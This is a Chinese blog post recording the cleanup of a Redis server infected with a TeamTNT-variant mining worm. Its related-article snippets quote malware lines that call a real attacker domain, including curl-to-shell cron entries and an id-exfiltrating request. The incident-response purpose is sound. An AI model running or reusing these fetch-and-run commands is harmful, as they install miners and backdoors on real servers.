记录一次服务器一直向外发送大量请求(挖矿病毒)排除

最新推荐文章于 2025-10-13 21:50:44 发布
原创 最新推荐文章于 2025-10-13 21:50:44 发布 · 691 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#服务器 #运维

1、症状

  1. 服务器一直向外发送SYN请求,并且无法通过netstat -anplt获取到对应的PID
  2. 服务器CPU一直很低,通过PS查找不到异常程序
  3. 安装NetHogs,工具卡死,无法显示是那个程序发起的请求(因为请求都是SYN_SEND,并且发生完成,进程就死亡),只能显示-

2、原因
1、大概率是因为Redis没有认证密码,通过aof设置定时任务,拉取病毒脚本http://oracle.zzhreceive.top/b2f628/b.sh
2、相关分析看博客1博客2
3、病毒是TeamTNT变种

3、解决方案

1、删除认证密钥
cd ~/.ssh/ 
cat authorized_keys*
[root@redis-server .ssh]# lsattr authorized_keys*  
-----a---------- authorized_keys
-----a---------- authorized_keys2
[root@redis-server .ssh]# chattr -a authorized_keys*
[root@redis-server .ssh]# echo > authorized_keys
[root@redis-server .ssh]# echo > authorized_keys2
2、停止进程,并且删除文件
rm -rf /var/tmp/.copydie/
[root@redis-server ~]# systemctl stop kswapd0
[root@redis-server ~]# rm -f /et
最低0.47元/天 解锁文章
遭遇疑似网络攻击时服务器异常情况排查方法
Protocol Stack | 传输与通信
06-21 2548
该方法主要用于发生网信安全异常情况时的异常设备信息提取和登机排查指导,主要包括主机类设备,linux和windows操作系统为主。
一次清理挖矿病毒的过程
邓邓子的博客
07-05 2461
网站挂掉了,查看后台服务已宕掉,无法正常重启。在没有启动任何服务的情况下,内存已基本被耗尽: 2.查看各进程资源使用情况 看到 xmrig 占用了资源。 查看 root 文件内容: 查看 .moneroocean 目录下文件: 4.删除文件 5.杀掉 xmrig 进程 查找所有的 xmrig 进程并杀掉: 6.重启服务 最好重启下服务器再重启服务,此时服务已正常。......
阿里云服务器被入侵执行MoneroOcean(门罗币)挖矿脚本
weixin_54071027的博客
06-26 1万+
为学习使用Redis,在阿里云Linux服务器上安装了redis并且后台运行,开放了默认端口,而且没有设置访问密码,当天晚上被执行了恶意脚本。 恶意代码如下,分享一下: #!/bin/bash us=$(id) curl "http://oracle.zzhreceive.top/b2f628/idcheck/$us" >>/dev/null ulimit -n 65535 export MOHOME=/usr/share mkdir $MOHOME -p if [ -f "$MOHOME/[
昨天才放开redis 6379端口,今天数据就被人清掉了,还留下了backup 的四个key
mikeguo's blog
07-27 4286
记录一下,以后有机会知道这四条数据什么意思 backup1 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup2 */2 * * * * root cd1 -fsSL http://oracle.zzhreceive.top/b2f628/b.sh | sh backup3 */4 * * * * root curl -fsSL http://oracle
pnscan 挖矿蠕虫病毒处理记(二)
SRE运维 网络 系统 安全
10-19 1275
在一的文章中,扫描的程序讲解了,但是真正的Boss(pnscan 挖矿)还没有解决,接下来继续: 机器安装了阿里云的动态感知,扫描到挖矿程序。 查看文件,发现这是一个脚本,先不要急于清理,先研究它的运行逻辑,发现有检测机制,文件会自动下载,像这种,强烈建议做一个域名本地解释(hosts)。 #!/bin/bash setenforce 0 2>/dev/null ulimit -u 50000 sleep 1 iptables -I INPUT 1 -p tcp --dport 63.
Linux服务器大量发包问题排查
TURING.DT
04-13 1万+
最近Linux redhat 6.5 APP 业务系统,向大量发送流量,不断建立tcp连接,目标地址是美国的一个IP, 估计被当成肉鸡了,比较悲惨,直接飞向IDC机房,防火墙显示这个APP服务器tcp连接很多每秒10W个, 从服务器上使用命令sar -n DEV 2 10 ,确实出现大量发包的问题,(下边是正常的,异常的情况eth0txpck/s 10000左右了) 先进行限速
记录linux遇到nanominer挖矿软件病毒以及暂时解决方案
liuskuif的博客
01-02 3037
小白遇到的nanominer挖矿软件病毒以及临时解决办法
CPU 飙升?记一次挖矿程序排查
最新发布
小狼碎碎念的博客
10-13 520
记录一次新手查杀挖矿病毒的流程
Linux 系统上安装防病毒软件 ​​ClamAV​​
weixin_72244090的博客
05-26 846
因为我这边是阿里云中的CentOS 安装epel-release 出现版本冲突。ClamAV 是 Linux 开源的防病毒工具,适用于文件扫描和恶意软件检测。按提示替换阿里云原有版本(自动移除冲突的。
Linux类服务器遭受攻击排查取证
weixin_42261331的博客
09-14 1536
前言: 大家日常早就对Windows中的病毒习惯了,对付Windows中的病毒,有很多办法:杀毒软件、专杀工具等,但是这些东西往往主要集中在windows这一领域。 很多企业使用了Linux操作系统,原因主要是Linux的安全性比较高,但随着业务及技术发展,面向Linux系统的攻击越来越多,Linux机器也会感染病毒。本文会对Linux病毒攻击排查及如何防范做初步的介绍。 Linux系统被入侵/中毒的表象,比较常见的中毒表现在以下三个方面: 1)服务器出去的带宽会跑高这个是中毒的一个特征。 ..
Tcp连接出现大量ESTABLISHED连接解决方法,记录一次对进程大量积压 ESTABLISHED 链接的排查记录,以及出现大量的UDP连接现象,服务端口连接数几十万,导致网络连接不上、缓慢、卡顿
代码讲故事
07-16 2939
Tcp连接出现大量ESTABLISHED连接解决方法,记录一次对进程大量积压 ESTABLISHED 链接的排查记录,以及出现大量的UDP连接现象,服务端口连接数几十万,导致网络连接不上、缓慢、卡顿。
大量syn请求处理的一些问题
ljq550000的专栏
05-31 1495
在高并发连接服务器编写时,当同一秒内大量连接进入,epoll_wait的et总是丢失一部分连接,经上网查询后要求对每次accept都需要循环检查,添加代码后少量连接没有问题,连接数量上100就又会丢失一部分连接,无论是et模式还是lt模式都有这种情况。 今天偶然觉得可能会是accept的问题,纯accept循环仍然丢失连接,wireshark抓包没有问题,都收到了确认,服务器客户端都没有报错苦思
Linux单网卡多个IP地址时,主动向发送数据时源IP选择问题
letterwhite的专栏
11-18 4607
在使用KEEPALIVED做高可用过程中遇到问题: 作为主机的服务器拥有VIP(虚拟IP),另一般还拥有自己的实际的IP地址.那当主机主动发起向往连接时,如何选择源IP地址呢. 前面已经有很多文章中有详细的讲解,如下的链接: https://blog.csdn.net/bjxg/article/details/8230538 链接中已经讲的很细了.经过测试有效记录在此.补充一点:...
SYN_SENT(请求连接)
热门推荐
xiaoA76的专栏
12-08 2万+
在命令提示符下(运行---cmd),输入 netstat  -na  回车. 出现如图其中 在"state" 中有个 SYN_SENT ,  "SYN_SENT "表示有计算机请求连接你的计算机.如果连接成功, "SYN_SENT"就会变成"ESTABLISHED". 如果在"state"中出现大量的"SYN_SENT ",那么你很有可能中了蠕虫病毒.出现这种情况,应该在命令提示符下,
远程桌面文件传输异常或者取消传输后一直显示正在取消
halu98541的博客
09-01 1025
远程桌面传输中断
项目实训2
weixin_45774350的博客
03-21 2634
一些异常情况处理
小白被挖矿木马整emo的一天
A_991128a的博客
02-20 836
今天在打开服务器准备进入docker中的mysql测试sqlmode时,突然发现进不去mysql,然后我一看,mysql挂了,不止mysql,其他应用也全挂了。kswapd0占用过高是因为 物理内存不足,使用swap分区与内存换页操作交换数据,导致CPU占用过高。(后来我才领悟,原来这根本不是kswapd0,而是木马程序伪装的[kswapd0],专门骗我这种小白)可以看到2394这个进程占用cpu最多,于是我看了很久没查出什么问题,于是直接kill 2349cpu降下来了。。。
那些年我们受到的网络攻击
hauchun的博客
02-11 9060
网络攻击
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

贝多芬也爱敲代码

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值